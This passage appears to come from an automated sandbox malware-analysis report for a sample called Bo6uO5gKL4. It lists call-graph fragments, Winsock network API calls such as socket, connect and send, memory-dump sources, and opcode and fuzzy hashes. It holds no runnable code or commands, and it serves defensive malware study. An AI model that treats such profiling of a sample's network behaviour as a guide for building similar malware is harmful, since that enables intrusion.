64adf3-64ae07 1908->1910 1911 64ae0d-64ae12 1908->1911 1909->1884 1909->1908 1910->1911 1916 64aea8-64aead 1910->1916 1912 64ae14-64ae17 1911->1912 1913 64ae1a-64ae1c call 64af70 1911->1913 1912->1913 1917 64ae21-64ae23 1913->1917 1916->1849 1918 64ae25-64ae27 1917->1918 1919 64ae93-64ae9d 1917->1919 1918->1849 1920 64aeaf-64aeb1 call 63e760 1919->1920 1921 64ae9f-64aea6 call 63e7c0 1919->1921 1924 64aeb6-64aebe 1920->1924 1921->1924 1926 64aec0-64aedb call 63e180 1924->1926 1927 64af1a-64af1f 1924->1927 1926->1849 1930 64aee1-64aeec 1926->1930 1927->1849 1931 64af02-64af06 1930->1931 1932 64aeee-64aeff 1930->1932 1933 64af0e-64af15 1931->1933 1934 64af08-64af0b 1931->1934 1932->1931 1933->1841 1934->1933
                                      APIs
                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0064AB9B
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0064ABE4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: ioctlsocketsocket
                                      • String ID:
                                      • API String ID: 416004797-0
                                      • Opcode ID: a48af1f23df6d63322a42610c66a6933f43bb1fc3f03c0841fcbfff3228c215e
                                      • Instruction ID: b0894ee7dcd09d9471dc26a308303aa52b8e26f05eccdc42f3fbbb7cbb829aed
                                      • Opcode Fuzzy Hash: a48af1f23df6d63322a42610c66a6933f43bb1fc3f03c0841fcbfff3228c215e
                                      • Instruction Fuzzy Hash: 43E1E170644302AFEB20CF94C885BABB7E6EF85304F144A2CF9988B391D775D944DB92
                                      Function 005878B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID: FD %s:%d sclose(%d)
                                      • API String ID: 2781271927-3116021458
                                      • Opcode ID: edecbc091442c7b2ea263d796b6072f84243c5391cd227a3a23ae08984b50e98
                                      • Instruction ID: be3115b4872fb4811e1f5a98f0bfa962d6e74578991c354bd23b2c4e7a6720b1
                                      • Opcode Fuzzy Hash: edecbc091442c7b2ea263d796b6072f84243c5391cd227a3a23ae08984b50e98
                                      • Instruction Fuzzy Hash: 8DD05E32A096322B852069597C4DC5BAFA8EECAF70B060CA8FD4077201E220DD0087E2
                                      Function 0064B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0064B29E,?,00000000,?,?), ref: 0064B0BA
                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00633C41,00000000), ref: 0064B0C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: ErrorLastconnect
                                      • String ID:
                                      • API String ID: 374722065-0
                                      • Opcode ID: d138ab3a2bef88ffbb1399474130b44be52afcb61e95c336de4a738f8e6fa514
                                      • Instruction ID: 3896e9d98ca5d30fac5d07afc9d202170ae92491ffc5c1c26d57ccfafd1c55e5
                                      • Opcode Fuzzy Hash: d138ab3a2bef88ffbb1399474130b44be52afcb61e95c336de4a738f8e6fa514
                                      • Instruction Fuzzy Hash: 1A01D8363042009BCB205A78DC44FABB39BFF89765F040754F978932D1D726ED508751
                                      Function 00634950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • gethostname.WS2_32(00000000,00000040), ref: 00634AA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: gethostname
                                      • String ID:
                                      • API String ID: 144339138-0
                                      • Opcode ID: c4380b07d40da6f9fdfc22197cca161ef7267a28bbd3b3e30085a45231351c62
                                      • Instruction ID: d4d737dd088457bf032e3d8d773207eacca2269cefa115f22d6e6235d784262c
                                      • Opcode Fuzzy Hash: c4380b07d40da6f9fdfc22197cca161ef7267a28bbd3b3e30085a45231351c62
                                      • Instruction Fuzzy Hash: 9351CC70A047008BE7309B25DD497A7F6E6AF41319F04193CE98A867E1EF75F844CB92
                                      Function 0064AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 0064AFD0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID:
                                      • API String ID: 3358416759-0
                                      • Opcode ID: 2498009bbd1d022ef20e9f805327fd63ae915ea12c1d699a52295f1e556689a5
                                      • Instruction ID: e3ad834c82cd89ed3b34f064428c1adcb93305cddd30bc6706e3ca8ff56c6617
                                      • Opcode Fuzzy Hash: 2498009bbd1d022ef20e9f805327fd63ae915ea12c1d699a52295f1e556689a5
                                      • Instruction Fuzzy Hash: 9B116670848785A5EB268F59D8027E6B3F4EFD0329F109619E59942150F7729ACA8BC2
                                      Function 0064A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0064A97F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: a01dae3757f71d297d8baf0fb4ea23d3e86d737b2eca6983d66a66948d89c869
                                      • Instruction ID: 8f9a236dcfaeceecf1e6dd6ab9fe464554b767fc4fe04a2e3c6a49a44ad1e148
                                      • Opcode Fuzzy Hash: a01dae3757f71d297d8baf0fb4ea23d3e86d737b2eca6983d66a66948d89c869
                                      • Instruction Fuzzy Hash: AE01A2B6B10710AFC7148F55DC85B96B7A5EF84721F06865DEA982B361C331AC108BE1
                                      Function 0064AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(?,0064B280,00000000,-00000001,00000000,0064B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0064AF67
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID:
                                      • API String ID: 98920635-0
                                      • Opcode ID: e1c5c366df3772df933ab935e18b37ba424da909f787789ef88cfedc2047e619
                                      • Instruction ID: 93541386cb3a6a066cc11876078c07e564ee6363cf53562212d20adea88f5e6b
                                      • Opcode Fuzzy Hash: e1c5c366df3772df933ab935e18b37ba424da909f787789ef88cfedc2047e619
                                      • Instruction Fuzzy Hash: 87E0EDB6A092216BD654DA58E8449EBF36EEFC4B20F055A49B85467304C730AC558BE2
                                      Function 0064B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • closesocket.WS2_32(?,00649422,?,?,?,?,?,?,?,?,?,?,?,w3c,00A5C880,00000000), ref: 0064B04D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: 5abf2a810b68984ae32f66623768236a3cf71b0ba668f532934eca6febe96276
                                      • Instruction ID: 2027a88956d1ce328dd581cb0da977e2731a1e57de2620eb2a4c55de166a7b7d
                                      • Opcode Fuzzy Hash: 5abf2a810b68984ae32f66623768236a3cf71b0ba668f532934eca6febe96276
                                      • Instruction Fuzzy Hash: 6DD0123470020157CB24DA14CC84A97766B7FD1B11FA9DB6CE42C4A655D73BDC47C641
                                      Function 005E67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • ioctlsocket.WS2_32(?,8004667E,?,?,005BAF56,?,00000001), ref: 005E67FC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: ioctlsocket
                                      • String ID:
                                      • API String ID: 3577187118-0
                                      • Opcode ID: 1b32e1f0730cba6d416a1de749af380967a63e7042b2e13ee150f70d5de46e3a
                                      • Instruction ID: fd7d81672d212ed3b44b79f2b11354356f5c918ce99ed8121b6d4dadcf1e78ad
                                      • Opcode Fuzzy Hash: 1b32e1f0730cba6d416a1de749af380967a63e7042b2e13ee150f70d5de46e3a
                                      • Instruction Fuzzy Hash: 15C012F1118601AFC6088714D865A6F76E8DB85355F01581CB04681180EA709990CA16
                                      Function 005831D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: b74837afb8a71d7e4e765e78b4896809b944beb96b86e514a6d9588528e566e8
                                      • Instruction ID: 9c24e8ae6b3c14f7356f439eb009b62e0a77423695cef8de6838625886e3a946
                                      • Opcode Fuzzy Hash: b74837afb8a71d7e4e765e78b4896809b944beb96b86e514a6d9588528e566e8
                                      • Instruction Fuzzy Hash: C13193B59057059FCB00FFB8C6856AEBBF0BF44745F008969E899A7241E7349A48CF52

                                      Non-executed Functions

                                      Function 0090E050 Relevance: 21.3, APIs: 8, Strings: 3, Instructions: 2082COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
